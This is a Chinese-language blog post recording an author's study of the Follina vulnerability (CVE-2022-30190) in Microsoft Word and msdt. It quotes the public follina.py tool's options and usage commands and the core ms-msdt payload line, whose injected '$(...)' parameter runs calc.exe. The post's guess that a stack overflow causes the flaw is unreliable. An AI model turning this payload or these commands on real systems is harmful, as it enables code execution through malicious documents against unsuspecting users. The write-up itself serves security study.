CVE-2022-30190漏洞的学习一

    看到这个漏洞，真是心中佩服地很，因为以前要“钓鱼”就要想办法绕过office的宏，难度大一P，现在有了这个漏洞就不用了，这个漏洞绝对是革命性“突破”，危害大得很。我前面写过两个Office分析都是基于宏“放行”的假设，为了知已知彼，我没有理由不来看看，就想了解一下，解开心中的“困惑”。

    关于这个漏洞，有人进行了总结，核心内容就是：恶意的Word文档，使用远程模板功能，以从一个远程服务器获取HTML文件。HTML代码然后使用微软的MS-MSDT URI协议执行PowerShell代码。

一、过程

  在网上有人公布了一个利用Payload，https://github.com/chvancooten/follina.py

1、Help：

$ python .follina.py -h

usage: follina.py [-h] -m {command,binary} [-b BINARY] [-c COMMAND] -t {rtf,docx} [-u URL] [-H HOST] [-P PORT]

options:

  -h, --help            show this help message and exit

Required Arguments:

  -m {command,binary}, --mode {command,binary}

Execution mode, can be "binary" to load a (remote) binary, or "command" to run an encoded PS command

Binary Execution Arguments:

  -b BINARY, --binary BINARY

The full path of the binary to run. Can be local or remote from an SMB share

Command Execution Arguments:

  -c COMMAND, --command COMMAND

  The encoded command to execute in "command" mode

Optional Arguments:

  -t {rtf,docx}, --type {rtf,docx}

 The type of payload to use, can be "docx" or "rtf"

  -u URL, --url URL     The hostname or IP address where the generated document should retrieve your payload, defaults to "localhost". Disables web server if custom URL scheme or path are specified

  -H HOST, --host HOST  The interface for the web server to listen on, defaults to all interfaces (0.0.0.0)

  -P PORT, --port PORT  The port to run the HTTP server on, defaults to 80

2、利用方法：

# Execute a local binary

python .follina.py -t docx -m binary -b windowssystem32calc.exe

# On linux you may have to escape backslashes

python .follina.py -t rtf -m binary -b \windows\system32\calc.exe

# Execute a binary from a file share (can be used to farm hashes 👀)

python .follina.py -t docx -m binary -b \localhostc$windowssystem32calc.exe

# Execute an arbitrary powershell command

python .follina.py -t rtf -m command -c "Start-Process c:windowssystem32cmd.exe -WindowStyle hidden -ArgumentList '/c echo owned > c:userspublicowned.txt'"

# Run the web server on the default interface (all interfaces, 0.0.0.0), but tell the malicious document to retrieve it at http://1.2.3.4/exploit.html

python .follina.py -t docx -m binary -b windowssystem32calc.exe -u 1.2.3.4

# Only run the webserver on localhost, on port 8080 instead of 80

python .follina.py -t rtf -m binary -b windowssystem32calc.exe -H 127.0.0.1 -P 8080

3、复现+分析: 

python follina.py -t docx -m binary -b windowssystem32calc.exe -H 127.0.0.1 -P 8080

在当前目录下生成clickme.docx和wwwexploit.html

并启动监听，我们架起工具，首先来打开生成的clickme.docx看看，

在word启动时，我们抓到了“正在打开 http://localhost:8080/exploit.html”字样，说明word和服务端在联系了。

其次，看下进程监视，

看到docx文档启动了word;

 看到word启动了msdt的命令行;

msdt就是：

与此同时，

sdiagnhost.exe启动了calc.exe；

在此过程中，还有conhost.exe被启动起来了；

最后，形成了docx->msdt->calc的过程：

所以，整个流程图如下：

最后，我们通过日志来梳理下过程：

这里有个问题，

（1）打开http://localhost:8080/exploit.html，出来：

打开，出现下图，这里面的密钥是什么？找了半天没找到？没走下去。

从以上过程来看，成功地实现了docx打开后弹出了calc计算器，根本没有通过宏。

二、msdt参数

Syntax

 

msdt </id <name> | /path <name> | /cab < name>> <</parameter> [options] … <parameter> [options]>>

Parameters

Parameter	Description
/id <packagename>	Specifies which diagnostic package to run. For a list of available packages, see Available Troubleshooting packs.
/path <directory|.diagpkg file|.diagcfg file>	Specifies the full path to a diagnostic package. If you specify a directory, the directory must contain a diagnostic package. You cannot use the /path parameter in conjunction with the** /id**, /dci, or /cab parameters.
/dci <passkey>	Prepopulates the passkey field. This parameter is only used when a support provider has supplied a passkey.
/dt <directory>	Displays the troubleshooting history in the specified directory. Diagnostic results are stored in the user’s %LOCALAPPDATA%Diagnostics or %LOCALAPPDATA%ElevatedDiagnostics directories.
/af <answerfile>	Specifies an answer file in XML format that contains responses to one or more diagnostic interactions.
/modal <ownerHWND>	Makes the troubleshooting pack modal to a window designated by the parent Console Window Handle (HWND), in decimal. This parameter is typically used by applications that launch a troubleshooting pack. For more information about obtaining Console Window Handles, see How to Obtain a Console Window Handle (HWND).
/moreoptions <true|false>	Enables (true) or suppresses (false) the final troubleshooting screen that asks if the user wants to explore additional options. This parameter is typically used when the troubleshooting pack is launched by a troubleshooter that isn't part of the operating system.
/param<parameters>	Specifies a set of interaction responses at the command line, similar to an answer file. This parameter isn't typically used within the context of troubleshooting packs created with TSP Designer. For more information about developing custom parameters, see Windows Troubleshooting Platform.==>在命令行指定一组交互响应，。。。核心：开发自定义参数！！！
/advanced	Expands the advanced link on the Welcome page by default when the troubleshooting pack is started.
/custom	Prompts the user to confirm each possible resolution before it is applied.

既然是自定义参数就好理解漏洞为啥产生了，应该是底层堆栈溢出了。

三、源码

1、看下生成的clickme.docx：

在文件里发现了链接的位置；

这里是两个模板；

2、py源码

两种方式；

3、核心代码：

核心：location.href = "ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=/../../$(\windows\system32\calc)/.exe"";

也可以命令行直接执行：msdt ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=/../../$(calc)/.exe"

后面有时间，再接着学习。

原文始发于微信公众号（MicroPest）：CVE-2022-30190漏洞的学习一